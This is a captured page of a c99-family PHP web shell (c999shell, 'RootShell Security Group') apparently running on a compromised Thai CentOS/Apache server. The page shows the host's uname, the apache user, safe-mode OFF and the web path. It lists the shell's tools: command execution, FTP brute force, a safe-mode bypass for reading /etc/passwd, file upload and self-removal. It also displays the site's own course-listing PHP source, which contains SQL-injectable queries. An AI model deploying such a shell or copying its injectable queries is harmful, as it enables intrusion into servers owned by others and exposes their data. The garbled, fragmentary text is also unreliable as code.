!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Outreac_project/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ShowTecherCourse.php (16.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {	
	
	/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
		require_once( "../includes/FunctionDB.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		$dbObj->RegDBConn();

		//=== SESSION
		$Username = $valid_user; 
		
		/**  Config Table for This Page  */
	$myTable2 = "Course";
	$myTable1 = "condition_db";
	$myTalbleOrder = "courseId ";
 
		
		$myTableField1 = "courseCode";
		$myTableField2 = "courseName";
		$myTableField3 = "courseUnit";
		
		
		
		
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }

		/**  Searching */
		$keyword = trim( $_REQUEST['keyword'] );
		$selectType = $_REQUEST['selectType'];
		
		$dbObj->DBConn();
		
		$id = $_REQUEST['courseId'];
		$num = count($id);
		for( $i=0; $i<$num; $i++ ) { 
	
	     $Mint = $_REQUEST['Mint'] ;
		 $courseId =$_REQUEST['courseId']; 
		 $outreacId =$_REQUEST['outreacId']; 
		 $Budget_Year =$_REQUEST['Budget_Year']; 
		
					 	if(isset($_REQUEST['act']) && $_REQUEST['act'] == "add"){
							InsertIntegration ($Mint ,$courseId, $Research_code, $proId, $outreacId ,$Flag,$Budget_Year );
							echo "";
						}
		    }
	
	$dbObj->RegDBConn();
	  /*  Parameters  **/
		$param = "outreacId=$outreacId&Mint=$Mint&$keyword&$selectType";
		  
		} # else
    	
		
 ?>





ข้อมูลรายวิชา






  

    
      execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( $keyword != "" ) { // ใส่ Keyword
			if( $selectType != "" ) { // เลือกรายการใน List
				switch( $selectType ) {
					case 1 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE     ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 	AND  $myTableField1 LIKE '%$keyword%' 	ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE     ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 	AND  $myTableField1 LIKE '%$keyword%' 	ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 2 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE      ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 	AND  $myTableField2 LIKE '%$keyword%'  	ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )  	AND  $myTableField2 LIKE '%$keyword%'   		ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 3 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE     ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )   	AND  $myTableField3 LIKE '%$keyword%'  ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable2  WHERE     ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )  	AND  $myTableField3 LIKE '%$keyword%'  	ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
				} # switch
			} else {  // หาเฉพาะที่ใส่ Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable2  WHERE   ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 			ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable2  WHERE     ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 		ORDER BY  $myTalbleOrder  ASC ";
				}
			}
		} #if
		else {
			if( isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable2      ORDER BY  $OrderBy  $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable2    ORDER BY  $myTalbleOrder  ASC ";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
      

        

          

            
            

          

             ‹ ย้อนกลับ
            จำนวนข้อมูลต่อหน้า
              
            

          

            

              
              

                ค้นหา 
                  
                  
                  
              

              

            

          

            
               0 ) { ?>
              

                
                

                  ทั้งหมด: 
                    
                     รายการ
                   
                  

                

              fetchArray($result) ) { 
			
				if( $keyword != "" ) {
					$courseCode = eregi_replace( $keyword, "\\0", $rs['courseCode'] );
					$courseName = eregi_replace( $keyword, "\\0", $rs['courseName'] );
				} else {
					$courseCode = $rs['courseCode'];
					$courseName = $rs['courseName'];
				}
			
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
                freeresult($result1);
          ?>
                

                

                   No
                  ชื่อวิชา
                  หน่วยกิต
                  บันทึก
                  

                

                  
                   
                  
                  
                  

                

              
              

                

                  
                     0 ) { ?>
                    

                      

                        
                        

                      

                        หน้า: 
                           1) {	
                            $previous = $display - 1;					
                    ?>
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--